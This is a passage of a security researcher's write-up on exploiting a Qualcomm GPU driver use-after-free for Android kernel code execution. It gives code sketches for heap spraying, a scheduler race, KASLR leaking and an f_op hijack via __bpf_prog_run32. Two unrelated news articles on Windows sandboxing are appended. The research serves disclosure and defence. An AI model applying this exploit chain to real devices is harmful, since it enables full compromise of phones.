		VERIFY(err, 0 == (err = interrupted));
		if (err)
			goto bail;                                        //<----- invocation failed and jump to bail directly
	}
    ...
	VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra));    //<------ detach the arguments
	PERF_END);
    ...
 bail:
    ...
	return err;
}

So by using FASTRPC_IOCTL_INVOKE_* with an invalid remote function, it is easy to allocate and keep the SWIOTLB alive until I choose to close the /dev/adsprpc-smd file that is used to make the ioctl call. This is the only part where the adsprpc driver is needed, and we’re now set up to start writing the exploit.
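
A sketch of this step follows. The struct layout, the REMOTE_SCALARS_MAKEX encoding, and the handle/method values are all assumptions based on the vendor’s adsprpc_shared.h header and vary between kernel trees; the key idea is simply that a failing invocation which passes a DMA buffer fd with FASTRPC_ATTR_NOMAP leaves the mapping (and its SWIOTLB) alive.

#include <sys/ioctl.h>
#include "adsprpc_shared.h"   /* vendor UAPI header; names are assumptions */

/* Sketch: keep a SWIOTLB mapping alive by passing a DMA buffer fd as a
 * NOMAP input handle to a remote invocation that is expected to fail;
 * put_args() is then skipped and the buffer stays attached until the
 * adsprpc fd is closed. Handle and method ids here are hypothetical. */
static void pin_swiotlb(int rpc_fd, int dmabuf_fd)
{
	int fds[1] = { dmabuf_fd };
	unsigned int attrs[1] = { FASTRPC_ATTR_NOMAP };
	struct fastrpc_ioctl_invoke_attrs inv = {
		/* 0 in/out buffers, 1 input handle (assumed scalar encoding) */
		.inv = { .handle = 1, .sc = REMOTE_SCALARS_MAKEX(0, 0, 0, 0, 1, 0),
			 .pra = NULL },
		.fds = fds,
		.attrs = attrs,
	};
	ioctl(rpc_fd, FASTRPC_IOCTL_INVOKE_ATTRS, &inv);  /* expected to fail */
}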

Now that I can allocate SWIOTLB buffers that map to DMA buffers I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.

  1. First allocate a number of DMA buffers. By manipulating the ion heap (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer DMA_1.
  2. Use the adsprpc driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that DMA_1 occupies the first SWIOTLB (which means all the other SWIOTLB buffers will be allocated behind it); call this SWIOTLB_1. This can be done easily, as SWIOTLB buffers are simply allocated from a contiguous array.
  3. Use the read/write primitive in the previous section to trigger out-of-bounds read/write on DMA_1. This will either write the memory behind DMA_1 to the SWIOTLB behind SWIOTLB_1, or vice versa.
  4. As the SWIOTLB behind SWIOTLB_1 are mapped to the other DMA buffers that I controlled, I can use the DMA_BUF_IOCTL_SYNC ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behind DMA_1.

The following figure illustrates this with a simplified case of two DMA buffers.

figure

Replacing the sg_table

So far, I’ve planned an exploitation strategy based on the assumption that I already have control of the scatterlist sgl of the free’d sg_table. In order to actually gain control of it, I need to replace the free’d sg_table with a suitable object. This turns out to be the most complicated part of the exploit. While there are well-known kernel heap spraying techniques that allow us to replace a free’d object with controlled data (for example the sendmsg and setxattr sprays), they cannot be applied directly here, as the sgl of the free’d sg_table needs to be a valid pointer that points to controlled data. Without a way to leak a heap address, I’ll not be able to use these heap spraying techniques to construct a valid object. With this bug alone, there is almost no hope of getting an info leak at this stage. The other alternative is to look for other suitable objects to replace the sg_table. A CodeQL query can be used to help look for suitable objects:

from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc"))
      and
      exists(Assignment assign | assign.getRValue() = fc and
             assign.getLValue() = v.getAnAccess() and
             v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() < 128 and t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      f.getByteOffset() = 0
select fc, t, fc.getLocation()

In this query, I look for objects created via kmalloc, kzalloc or kcalloc that are of size smaller than 128 (the same bucket as sg_table) and have a pointer field as the first field. However, I wasn’t able to find a suitable object, although filename, allocated in getname_flags, came close:

struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
	struct filename *result;
    ...
	if (unlikely(len == EMBEDDED_NAME_MAX)) {
        ...
		result = kzalloc(size, GFP_KERNEL);
		if (unlikely(!result)) {
			__putname(kname);
			return ERR_PTR(-ENOMEM);
		}
		result->name = kname;
		len = strncpy_from_user(kname, filename, PATH_MAX);
        ...

with name pointing to a user controlled string, reachable using, for example, the mknod syscall. However, not being able to use null characters turns out to be too much of a restriction here.

Just-in-time object replacement

Let’s take a look at how the free’d sg_table is used, say, in __ion_dma_buf_begin_cpu_access. At some point in the execution, the sgl field is taken from the sg_table, after which the sg_table itself is no longer used; only the cached pointer value of sgl is used:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
					  enum dma_data_direction direction,
					  bool sync_only_mapped)
{
    
		if (sync_only_mapped)
			tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,    //<------- `sgl` got passed, and `table` never used again
						  a->table->nents,
						  &buffer->vmas,
						  direction, true);
		else
			dma_sync_sg_for_cpu(a->dev, a->table->sgl,
					    a->table->nents, direction);

While source code can be misleading, as function inlining is common in kernel code (in fact ion_sgl_sync_mapped is inlined here), the bottom line is that, at some point, the value of sgl will be cached in a register and the state of the original sg_table will no longer affect the code path. So if I am able to first replace a->table with another sg_table, then deleting this new sg_table using sg_free_table will also cause its sgl to be deleted; of course, there is clean up logic that then sets sgl to NULL. But what if I set up another thread to delete this new sg_table after sgl has already been cached in a register? Then it won’t matter that sgl is set to NULL, because the value in the register will still be pointing to the original scatterlist, and as this scatterlist is now free’d, I get a use-after-free of sgl directly in ion_sgl_sync_mapped. I can then use sendmsg to replace it with controlled data. There is one major problem with this, though: the time between sgl being cached in a register and the time where it is used again is very short, so it is normally not possible to fit the entire sg_table replacement sequence within such a short time frame, even if I race the slowest cpu core against the fastest.

To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.

To ensure that each task (thread or process) has a fair share of the cpu time, the linux kernel scheduler can interrupt a running task and put it on hold, so that another task can run. This kind of interruption and stopping of a task is called preemption (where the interrupted task is preempted). A task can also put itself on hold to allow other tasks to run, such as when it is waiting for some I/O input, or when it calls sched_yield(). In this case, we say that the task is voluntarily preempted. Preemption can happen inside syscalls such as ioctl calls as well, and on Android, tasks can be preempted except in some critical regions (e.g. while holding a spinlock). This means that a thread running the DMA_BUF_IOCTL_SYNC ioctl call can be interrupted after the sgl field is cached in a register and be put on hold. The default behavior, however, will not normally give us much control over when the preemption happens, nor how long the task is put on hold.

To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task runs with the priority SCHED_NORMAL, but a lower priority, SCHED_IDLE, can also be set using the sched_setscheduler call (or pthread_setschedparam for threads). Furthermore, a task can be pinned to a cpu with sched_setaffinity, which will only allow it to run on a specific cpu. By pinning two tasks, one with SCHED_NORMAL priority and the other with SCHED_IDLE priority, to the same cpu, it is possible to control the timing of the preemption as follows (a code sketch of the setup follows the list).

  1. First have the SCHED_NORMAL task perform a syscall that causes it to pause and wait. For example, it can read from a pipe with no data coming in from the other end; it will then wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
  2. As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task has been waiting on. This will wake up the SCHED_NORMAL task, and because of the task priorities, the SCHED_IDLE task will be preempted and put on hold.
  3. The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.
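
A sketch of the thread setup, using the POSIX names (SCHED_OTHER is the userspace name for SCHED_NORMAL, and SCHED_IDLE requires _GNU_SOURCE):

#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>

/* Sketch: pin the calling thread to `cpu` and set its policy
 * (SCHED_OTHER for the blocker, SCHED_IDLE for the victim thread
 * that runs DMA_BUF_IOCTL_SYNC). */
static void pin_and_set_policy(int cpu, int policy)
{
	cpu_set_t set;
	CPU_ZERO(&set);
	CPU_SET(cpu, &set);
	sched_setaffinity(0, sizeof(set), &set);   /* 0 = calling thread */

	struct sched_param param = { .sched_priority = 0 };
	sched_setscheduler(0, policy, &param);
}

/* Blocker thread: reading an empty pipe yields the cpu (step 1); once
 * the main task writes to the pipe it wakes up (step 2) and spins,
 * holding the SCHED_IDLE task off the cpu (step 3). */
static void *blocker(void *arg)
{
	int *pipefd = arg;
	char c;
	pin_and_set_policy(1, SCHED_OTHER);        /* same cpu as the victim */
	read(pipefd[0], &c, 1);                    /* voluntary preemption */
	for (;;)
		;  /* busy loop; a real exploit would add an exit condition */
	return NULL;
}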

In our case, the object replacement sequence goes as follows:

  1. Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
  2. First replace this free’d sg_table with another one that I can free easily. For example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns an sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn free the sg_table. In practice, a little bit more heap manipulation is needed, as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating an sg_table.
  3. Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
  4. Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
  5. The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
  6. The main task waits a suitable amount of time until sgl is cached in a register, then sends data to the pipe that the SCHED_NORMAL task is waiting on.
  7. Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
  8. The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free up the sg_table, which will also free the object pointed to by the sgl that is now cached in a register. The main task then replaces this object with controlled data using sendmsg heap spraying. This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
  9. The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.

The following figure illustrates what happens in an ideal world.

figure

The following figure illustrates what happens in the real world.

figure

Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing even work on both the Galaxy A71 and the Pixel 4. Even when the race fails, it does not result in a crash. It can, however, crash if the SCHED_IDLE task resumes too quickly. For some reason, I only managed to hold that task for about 10-20ms, and sometimes this is not long enough for the object replacement to complete.
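
For reference, the sendmsg spray used in step eight has the following shape: the ancillary data passed in msg_control is copied into a kmalloc’d kernel buffer of attacker-chosen size, so a payload laid out as a fake scatterlist can overlap the free’d object. This is a minimal sketch of one spray iteration; in practice the socket’s queue would be kept full so that the kernel copy stays alive long enough.

#include <string.h>
#include <sys/socket.h>

/* Sketch of one sendmsg spray iteration: msg_control is copied into a
 * kmalloc buffer of size msg_controllen inside sendmsg, so choosing
 * the size selects the slab bucket of the free'd object. */
static void spray_once(int sock, const void *payload, size_t len)
{
	char buf[128] = {0};     /* size chosen to match the target bucket */
	struct msghdr msg = {0};
	struct cmsghdr *c = (struct cmsghdr *)buf;

	c->cmsg_len = sizeof(buf);               /* one cmsg spanning the buffer */
	if (len > sizeof(buf) - sizeof(*c))
		len = sizeof(buf) - sizeof(*c);
	memcpy(CMSG_DATA(c), payload, len);      /* fake scatterlist content */

	msg.msg_control = buf;                   /* copied to kmalloc'd memory */
	msg.msg_controllen = sizeof(buf);
	sendmsg(sock, &msg, MSG_DONTWAIT);
}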

The ion heap

Now that I’m able to replace the scatterlist with controlled data and make use of the read/write primitives in the section Allocating a Software Input Output Translation Lookaside Buffer, it is time to think about what data I can place behind the DMA buffers.

To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that allocates buffers with addresses greater than 32 bits. The locations of the various ion heaps can be seen in the kernel log during boot; the following is from a Galaxy A71:

[    0.626370] ION heap system created
[    0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[    0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[    0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[    0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[    0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[    0.631655] ION heap secure_carveout created
[    0.631669] ION heap secure_heap created
[    0.634265] cleancache enabled for rbin cleancache
[    0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000

As we can see, some ion heaps are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that do not have a fixed address. These are the heaps with addresses higher than 32 bits. For the exploit, I’ll use the system heap.

DMA buffers on the system heap are allocated via the ion_system_heap_allocate function call. It’ll first try to allocate a buffer from a preallocated memory pool. If the pool is exhausted, it’ll allocate more pages using alloc_pages:

static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
{
	struct page *page = alloc_pages(pool->gfp_mask, pool->order);
    ...
	return page;
}

and recycle the pages back to the pool after the buffer is freed.

This latter case is more interesting, because if the memory is allocated from the initial pool, then any out-of-bounds read/write is likely to just hit other ion buffers, which only contain user space data. So let’s take a look at alloc_pages.

The function alloc_pages allocates memory with page granularity using the buddy allocator. When using alloc_pages, the second parameter, order, specifies the size of the requested memory, and the allocator will return a memory block consisting of 2^order contiguous pages. To exploit an overflow of memory allocated by the buddy allocator (a DMA buffer from the system heap), I’ll use the results from Exploiting the Linux kernel via packet sockets by Andrey Konovalov. The key point is that, while objects allocated from kmalloc and co. (i.e. kmalloc, kzalloc and kcalloc) are allocated via the slab allocator, which uses preallocated memory blocks (slabs) to allocate small objects, when the slabs run out, the slab allocator will use the buddy allocator to allocate a new slab. The output of /proc/slabinfo gives an indication of the size of slabs in pages.

kmalloc-8192        1036   1036   8192    4    8 : tunables    0    0    0 : slabdata    262    262      0
...
kmalloc-128       378675 384000    128   32    1 : tunables    0    0    0 : slabdata  12000  12000      0

In the above, the 5th column indicates the size of the slabs in pages. So, for example, if the size 8192 bucket runs out, the slab allocator will ask the buddy allocator for a memory block of 8 pages, which is order 3 (2^3 = 8), to use as a new slab. So by exhausting a slab bucket, I can cause a new slab to be allocated in the same region as the ion system heap, which could allow me to over read/write kernel objects allocated via kmalloc and co.

Manipulating the buddy allocator heap

As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and uses it to allocate memory of the appropriate order. When a certain order (n) runs out of memory, it’ll look for a free block in the next order up, split it in half and add the halves to the freelist of the requested order. If the next order is also exhausted, it’ll look for free blocks in the next higher order, and so on. So by repeatedly allocating blocks of a certain order, eventually the freelists will be exhausted and larger blocks will be broken up, which means that consecutive allocations will be adjacent to each other.

In fact, after some experimentation on the Pixel 4, it seems that after allocating a certain number of DMA buffers from the ion system heap, the allocations follow a very predictable pattern.

  1. The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
  2. Within each block, a new allocation will be adjacent to the previous one, with a higher address.
  3. When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.

The following figure illustrates this pattern.

figure

So by simply creating a large number of DMA buffers in the ion system heap, the likelihood is that the last allocated buffer will sit in front of a "hole" of free memory, and the next allocation from the buddy allocator is likely to be inside this hole, provided the requested number of pages fits.

The heap spraying strategy is then very simple. First allocate a sufficient number of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large number of objects using kmalloc and co. to cause a new slab to be created. This new slab is then likely to fall into the hole behind the last allocated DMA buffer. Using the use-after-free to overflow this buffer then allows me to gain arbitrary read/write of the newly created slab.
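
In outline, the two-phase spray might look like this, where alloc_dma_buffer is a hypothetical wrapper around the ion allocation sketched earlier and the counts are device-dependent tuning knobs:

#include <fcntl.h>
#include <unistd.h>

#define N_DMA_BUFS 1024   /* phase 1: carve up the buddy freelists */
#define N_FILES    2048   /* phase 2: force new slabs into the hole */

extern int alloc_dma_buffer(size_t len);   /* hypothetical ion wrapper */

static int dma_fds[N_DMA_BUFS];
static int file_fds[N_FILES];

static void shape_heap(void)
{
	/* phase 1: ion system heap allocations break up high-order blocks */
	for (int i = 0; i < N_DMA_BUFS; i++)
		dma_fds[i] = alloc_dma_buffer(0x1000);

	/* phase 2: each open() allocates a file struct (and, for
	 * /dev/binder, a binder_proc) from a slab; exhausting the slabs
	 * forces the buddy allocator to place a new slab in the hole */
	for (int i = 0; i < N_FILES; i++)
		file_fds[i] = open("/dev/null", O_RDONLY);
}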

Defeating KASLR and leaking address to DMA buffer

Initially, I was experimenting with the binder_open call, as it is easy to reach (just do open("/dev/binder")) and will allocate a binder_proc struct:

static int binder_open(struct inode *nodp, struct file *filp)
{
    ...
	proc = kzalloc(sizeof(*proc), GFP_KERNEL);
	if (proc == NULL)

which is of size 560 and will persist until the /dev/binder file is closed. So it should be relatively easy to exhaust the kmalloc-1024 slab with this. However, after dumping the results of the out-of-bounds read, I noticed a recurring memory pattern:

00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff  h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000  ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000  ................
...

The 08af 5109 80ff ffff in the second part of the first line looks like a kernel address. Indeed, it is the address of binder_fops:

# echo 0 > /proc/sys/kernel/kptr_restrict                                                                                                                                                
# cat /proc/kallsyms | grep ffffff800951af08                                                                                                                                                 
ffffff800951af08 r binder_fops

So it looks like these are the file structs of the binder files that I opened, and what I’m seeing here is the field f_op, which points to binder_fops. Moreover, the 32 bytes after f_op are the same for every file struct of the same type, which offers a pattern for identifying these files. So by reading the memory behind the DMA buffer and looking for this pattern, I can locate the file structs that belong to the binder devices that I opened.

Moreover, the file struct contains a mutex f_pos_lock, which contains a field wait_list:

struct mutex {
	atomic_long_t		owner;
	spinlock_t		wait_lock;
    ...
	struct list_head	wait_list;
...
};

which is a standard doubly linked list in linux:

struct list_head {
	struct list_head *next, *prev;
};

When wait_list is initialized, the head of the list is just a pointer to itself, which means that by reading the next or prev pointer of the wait_list, I can obtain the address of the file struct itself. This then allows me to work out the address of the DMA buffer that I control, because the offset between the file struct and the buffer is known (by looking at its offset in the data that I dumped; in this example, the offset is 0x11020).
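
Concretely, the address recovery might look like the following sketch. The offsets are hypothetical placeholders that would have to be derived from the target kernel build, and the static binder_fops address would come from the unslid kernel image’s symbol table.

#include <stdint.h>

#define OFF_WAIT_LIST      0x58  /* offsetof(struct file, f_pos_lock.wait_list); placeholder */
#define BINDER_FOPS_STATIC 0xffffff800951af08ULL  /* unslid address; placeholder */

/* Sketch: given the offset of a recognized file struct in the dump and
 * two values read from it, recover the KASLR slide and the kernel
 * address of the DMA buffer the dump started from. */
static void recover_addresses(uint64_t f_op, uint64_t wait_next,
			      uint64_t dump_off,
			      uint64_t *kaslr_slide, uint64_t *dma_buf_kaddr)
{
	*kaslr_slide = f_op - BINDER_FOPS_STATIC;

	/* an empty wait_list points to itself, leaking the address of the
	 * mutex inside the file struct, hence of the file struct itself */
	uint64_t file_kaddr = wait_next - OFF_WAIT_LIST;

	/* the file struct sits dump_off bytes behind the DMA buffer */
	*dma_buf_kaddr = file_kaddr - dump_off;
}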

Using the address of binder_fops, it is easy to work out the KASLR slide, and knowing the address of a controlled DMA buffer, I can use it to store a fake file_operations (the "vtable" of a file struct) and overwrite the f_op of my file struct to point to it. The path to arbitrary code execution is now clear.

  1. Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
  2. Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
  3. Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
  4. Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two to work out the address of the DMA buffer.
  5. Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_op pointer of the file that corresponds to this file struct (which I own), so that it points to a fake file_operations struct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.

Since there is nothing special about binder files, in the actual exploit, I used /dev/null instead of /dev/binder, but the idea is the same. I’ll now explain how to do the last step in the above to gain arbitrary kernel code execution.

Getting arbitrary kernel code execution

To complete the exploit, I’ll use "the ultimate ROP gadget" that was used in An iOS hacker tries Android by Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const struct bpf_insn *insn)

To invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This allows me to perform arbitrary memory loads/stores and to call arbitrary kernel functions with up to five arguments and a 64 bit return value.

There is, however, one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.

For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Bypasses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.

Without going into much detail about RKP, the two parts that are relevant to our situation are:

  1. RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
  2. RKP protects important data structures, such as the credentials of a process, so that they are effectively read only.

Point one means that even though I can hijack the f_op pointer of my file struct, I cannot jump to an arbitrary location. However, it is still possible to jump to the start of any function. The practical implication is that while I can control the function that I call, I may not be able to control the call arguments. Point two means that the usual shortcut of overwriting the credentials of my own process with those of a root process would not work. There are other post-exploitation techniques that can be used to overcome this, which I’ll briefly explain later, but for the exploit of this post, I’ll just stop short at arbitrary kernel code execution.

In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the file_operations, which contains a whole array of possible calls that are thin wrappers of various syscalls, makes it likely that I can find a file operation with a 64 bit second argument that I control by making the appropriate syscall. In fact, I don’t even need to look that far. The first operation, llseek, fits the bill:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
    ...

This function takes a 64 bit integer, loff_t, as its second argument and can be invoked by calling the lseek64 syscall:

off_t lseek64(int fd, off_t offset, int whence);

where offset translates directly into the loff_t argument of llseek. So by pointing the f_op of my file to a fake file_operations whose llseek field is the address of __bpf_prog_run32, I can invoke any eBPF program of my choice any time I call lseek64, without even the need to trigger the bug again. This gives me arbitrary kernel memory read/write and code execution.
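
Wired together, the final primitive might look like the following sketch. Here dma_buf_user is my user space mapping of the DMA buffer, dma_buf_kaddr its kernel address recovered earlier, and overwrite_f_op a hypothetical helper standing in for the out-of-bounds write primitive built above.

#define _LARGEFILE64_SOURCE
#include <stdint.h>
#include <string.h>
#include <unistd.h>

extern void overwrite_f_op(uint64_t new_f_op);   /* hypothetical: OOB write */

/* Sketch: build a fake file_operations in the DMA buffer and point the
 * target file's f_op at it. Offset 8 is llseek, right after *owner. */
static void install_fake_fops(uint8_t *dma_buf_user, uint64_t dma_buf_kaddr,
			      uint64_t bpf_prog_run32_kaddr)
{
	uint64_t *fake_fops = (uint64_t *)dma_buf_user;
	memset(fake_fops, 0, 0x100);
	fake_fops[1] = bpf_prog_run32_kaddr;   /* llseek -> __bpf_prog_run32 */
	overwrite_f_op(dma_buf_kaddr);
}

/* Later, with eBPF bytecode placed at prog_kaddr inside the same DMA
 * buffer: the second lseek64 argument becomes the insn pointer. */
static long run_kernel_bpf(int fd, uint64_t prog_kaddr)
{
	return lseek64(fd, prog_kaddr, SEEK_SET);
}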

As explained before, because of RKP it is not possible to simply overwrite process credentials to become root, even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all userspace data and processes are essentially under our control, and there are many ways to take over privileged user processes, such as those with system privilege, and thereby effectively gain their privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique, described in Galaxy’s Meltdown — Exploiting SVE-2020-18610, is to overwrite the kernel stack of privileged processes to gain arbitrary kernel code execution as a privileged process. In short, there are many post-exploitation techniques available at this stage to effectively root the phone.

Conclusion

In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was the result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean-up logic being applied when an error occurred. In this case, two common software errors, ambiguity in the role of a type and incorrect handling of errors, combined to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.

While great progress has been made in sandboxing userspace services in Android, the kernel, and in particular vendor drivers, remains a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to the full power of the kernel, which often results in a much shorter exploit chain.

The full exploit can be found here with some set up notes.

Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.

Microsoft unveils Windows Sandbox: Run any app in a disposable virtual machine

( Original text by PETER BRIGHT )

A few months ago, Microsoft let slip a forthcoming Windows 10 feature that was, at the time, called InPrivate Desktop: a lightweight virtual machine for running untrusted applications in an isolated environment. That feature has now been officially announced with a new name, Windows Sandbox.

Windows 10 already uses virtual machines to increase isolation between certain components and protect the operating system. These VMs have been used in a few different ways. Since its initial release, for example, suitably configured systems have used a small virtual machine running alongside the main operating system to host portions of LSASS. LSASS is a critical Windows subsystem that, among other things, knows various secrets, such as password hashes, encryption keys, and Kerberos tickets. Here, the VM is used to protect LSASS from hacking tools, such that even if the base operating system is compromised, these critical secrets might be kept safe.

In the other direction, Microsoft added the ability to run Edge tabs within a virtual machine to reduce the risk of compromise when visiting a hostile website. The goal here is the opposite of the LSASS virtual machine—it’s designed to stop anything nasty from breaking out of the virtual machine and contaminating the main operating system, rather than preventing an already contaminated main operating system from breaking into the virtual machine.

Windows Sandbox is similar to the Edge virtual machine but designed for arbitrary applications. Running software in a virtual machine and then integrating that software into the main operating system is not new—VMware has done this on Windows for two decades now—but Windows Sandbox is using a number of techniques to reduce the overhead of the virtual machine while also maximizing the performance of software running within the VM, without compromising the isolation it offers.

The sandbox depends on operating system files residing in the host. (Image: Microsoft)

Traditional virtual machines have their own operating system installation stored on a virtual disk image, and that operating system must be updated and maintained separately from the host operating system. The disk image used by Windows Sandbox, by contrast, shares the majority of its files with the host operating system; it contains a small amount of mutable data, the rest being immutable references to host OS files. This means that it’s always running the same version of Windows as the host and that, as the host is updated and patched, the sandbox OS is likewise updated and patched.

Sharing is used for memory, too; operating system executables and libraries loaded within the VM use the same physical memory as those same executables and libraries loaded into the host OS.

That sharing of the host’s operating system files even occurs when the files are loaded into memory. (Image: Microsoft)

Standard virtual machines running a complete operating system include their own process scheduler that carves up processor time between all the running threads and processes. For regular VMs, this scheduler is opaque; the host just knows that the guest OS is running, and it has no insight into the processors and threads within that guest. The sandbox virtual machine is different; its processes and threads are directly exposed to the host OS’ scheduler, and they are scheduled just like any other threads on the machine. This means that if the sandbox has a low priority thread, it can be displaced by a higher priority thread from the host. The result is that the host is generally more responsive, and the sandbox behaves like a regular application, not a black-box virtual machine.

On top of this, video cards with WDDM 2.5 drivers can offer hardware-accelerated graphics to software running within the sandbox. With older drivers, the sandbox will run with the kind of software-emulated graphics that are typical of virtual machines.

Taken together, Windows Sandbox combines elements of virtual machines and containers. The security boundary between the sandbox and the host operating system is a hardware-enforced boundary, as is the case with virtual machines, and the sandbox has virtualized hardware much like a VM. At the same time, other aspects—such as sharing executables both on-disk and in-memory with the host as well as running an identical operating system version as the host—use technology from Windows Containers.

At least for now, the Sandbox appears to be entirely ephemeral. It gets destroyed and reset whenever it’s closed, so no changes can persist between runs. The Edge virtual machines worked similarly in their first incarnation; in subsequent releases, Microsoft added support for transferring files from the virtual machine to the host so that they could be stored persistently. We’d expect a similar kind of evolution for the Sandbox.

Windows Sandbox will be available in Insider builds of Windows 10 Pro and Enterprise starting with build 18305. At the time of writing, that build hasn’t shipped to insiders, but we expect it to be coming soon.

Microsoft Sandboxes Windows Defender

As the infosec community talked about potential cyber attacks leveraging vulnerabilities in antivirus products, Microsoft took notes and started to work on a solution. The company announced that its Windows Defender can run in a sandbox.

Antivirus software runs with the highest privileges on the operating system, a level of access coveted by any threat actor, so any exploitable vulnerabilities in these products add to the possibilities of taking over the system.

By making Windows Defender run in a sandbox, Microsoft makes sure that the security holes its product may have stay contained within the isolated environment; unless the attacker finds a way to escape the sandbox, which is among the toughest things to do, the system remains safe.

Remote code execution flaws

Windows Defender has seen its share of vulnerability reports. Last year, Google’s experts Natalie Silvanovich and Tavis Ormandy announced a remote code execution (RCE) bug severe enough to make Microsoft release an out-of-band update to fix the problem.

In April this year, Microsoft patched another RCE in Windows Defender, which could be abused via a specially crafted RAR file. When the antivirus scanned the file as part of its protection routine, the bug would trigger, giving the attacker control over the system in the context of the local user.

Microsoft is not aware of any attacks in the wild actively targeting or exploiting its antivirus solution, but it acknowledges the potential risk, hence its effort to sandbox Windows Defender.

Turn on sandboxing for Windows Defender

The new capability has been gradually rolling out to Windows Insider users for test runs, but it can also be enabled on Windows 10 starting with version 1703.

Regular users can also run Windows Defender in a sandbox if they have the operating system version mentioned above. They can do this by enabling the following system-wide setting from a Command Prompt with admin privileges:

setx /M MP_FORCE_USE_SANDBOX 1

Restarting the computer is necessary for the setting to take effect. Reverting the setting is possible by changing the value for forcing sandboxing to 0 (zero) and rebooting the system.
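
In other words, the revert command is the following, again followed by a reboot:

setx /M MP_FORCE_USE_SANDBOX 0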

Sandboxing Windows Defender

